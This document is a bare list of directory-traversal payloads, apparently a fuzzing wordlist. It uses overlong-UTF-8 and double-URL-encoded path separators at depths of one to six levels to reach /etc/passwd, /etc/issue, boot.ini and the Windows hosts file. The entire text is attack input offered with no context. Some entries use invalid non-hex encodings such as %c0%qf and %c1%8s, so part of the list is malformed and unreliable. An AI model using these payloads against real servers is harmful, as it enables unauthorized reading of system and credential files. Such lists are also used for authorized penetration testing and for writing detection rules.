-%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cetc%255cpasswd -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cetc%255cissue -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cboot.ini -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cetc%255cpasswd -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cetc%255cissue -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cboot.ini -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cetc%255cpasswd -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cetc%255cissue -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cboot.ini -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cetc%255cpasswd -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cetc%255cissue -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cboot.ini -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%fe%c0%fe%c0%2fetc%c0%2fpasswd -%c0%fe%c0%fe%c0%2fetc%c0%2fissue -%c0%fe%c0%fe%c0%2fboot.ini -%c0%fe%c0%fe%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fetc%c0%2fpasswd -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fetc%c0%2fissue -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fboot.ini -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fetc%c0%2fpasswd -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fetc%c0%2fissue -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fboot.ini -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fetc%c0%2fpasswd -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fetc%c0%2fissue -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fboot.ini -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fetc%c0%2fpasswd -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fetc%c0%2fissue -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fboot.ini -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fetc%c0%2fpasswd -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fetc%c0%2fissue -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fboot.ini -%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2f%c0%fe%c0%fe%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%fe%c0%fe%c0%afetc%c0%afpasswd -%c0%fe%c0%fe%c0%afetc%c0%afissue -%c0%fe%c0%fe%c0%afboot.ini -%c0%fe%c0%fe%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afetc%c0%afpasswd -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afetc%c0%afissue -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afboot.ini -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afetc%c0%afpasswd -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afetc%c0%afissue -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afboot.ini -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afetc%c0%afpasswd -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afetc%c0%afissue -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afboot.ini -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afetc%c0%afpasswd -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afetc%c0%afissue -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afboot.ini -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afetc%c0%afpasswd -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afetc%c0%afissue -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afboot.ini -%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%af%c0%fe%c0%fe%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%fe%c0%fe%c0%5cetc%c0%5cpasswd -%c0%fe%c0%fe%c0%5cetc%c0%5cissue -%c0%fe%c0%fe%c0%5cboot.ini -%c0%fe%c0%fe%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cetc%c0%5cpasswd -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cetc%c0%5cissue -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cboot.ini -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cetc%c0%5cpasswd -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cetc%c0%5cissue -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cboot.ini -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cetc%c0%5cpasswd -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cetc%c0%5cissue -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cboot.ini -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cetc%c0%5cpasswd -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cetc%c0%5cissue -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cboot.ini -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cetc%c0%5cpasswd -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cetc%c0%5cissue -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cboot.ini -%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5c%c0%fe%c0%fe%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%fe%c0%fe%c1%9cetc%c1%9cpasswd -%c0%fe%c0%fe%c1%9cetc%c1%9cissue -%c0%fe%c0%fe%c1%9cboot.ini -%c0%fe%c0%fe%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cetc%c1%9cpasswd -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cetc%c1%9cissue -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cboot.ini -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cetc%c1%9cpasswd -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cetc%c1%9cissue -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cboot.ini -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cetc%c1%9cpasswd -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cetc%c1%9cissue -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cboot.ini -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cetc%c1%9cpasswd -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cetc%c1%9cissue -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cboot.ini -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cetc%c1%9cpasswd -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cetc%c1%9cissue -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cboot.ini -%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9c%c0%fe%c0%fe%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%fe%c0%fe%c1%pcetc%c1%pcpasswd -%c0%fe%c0%fe%c1%pcetc%c1%pcissue -%c0%fe%c0%fe%c1%pcboot.ini -%c0%fe%c0%fe%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcetc%c1%pcpasswd -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcetc%c1%pcissue -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcboot.ini -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcetc%c1%pcpasswd -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcetc%c1%pcissue -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcboot.ini -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcetc%c1%pcpasswd -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcetc%c1%pcissue -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcboot.ini -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcetc%c1%pcpasswd -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcetc%c1%pcissue -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcboot.ini -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcetc%c1%pcpasswd -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcetc%c1%pcissue -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcboot.ini -%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%fe%c0%fe%c0%9vetc%c0%9vpasswd -%c0%fe%c0%fe%c0%9vetc%c0%9vissue -%c0%fe%c0%fe%c0%9vboot.ini -%c0%fe%c0%fe%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vetc%c0%9vpasswd -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vetc%c0%9vissue -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vboot.ini -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vetc%c0%9vpasswd -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vetc%c0%9vissue -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vboot.ini -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vetc%c0%9vpasswd -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vetc%c0%9vissue -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vboot.ini -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vetc%c0%9vpasswd -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vetc%c0%9vissue -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vboot.ini -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vetc%c0%9vpasswd -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vetc%c0%9vissue -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vboot.ini -%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9v%c0%fe%c0%fe%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%fe%c0%fe%c0%qfetc%c0%qfpasswd -%c0%fe%c0%fe%c0%qfetc%c0%qfissue -%c0%fe%c0%fe%c0%qfboot.ini -%c0%fe%c0%fe%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfetc%c0%qfpasswd -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfetc%c0%qfissue -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfboot.ini -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfetc%c0%qfpasswd -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfetc%c0%qfissue -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfboot.ini -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfetc%c0%qfpasswd -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfetc%c0%qfissue -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfboot.ini -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfetc%c0%qfpasswd -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfetc%c0%qfissue -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfboot.ini -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfetc%c0%qfpasswd -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfetc%c0%qfissue -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfboot.ini -%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qf%c0%fe%c0%fe%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%fe%c0%fe%c1%8setc%c1%8spasswd -%c0%fe%c0%fe%c1%8setc%c1%8sissue -%c0%fe%c0%fe%c1%8sboot.ini -%c0%fe%c0%fe%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8setc%c1%8spasswd -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8setc%c1%8sissue -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8sboot.ini 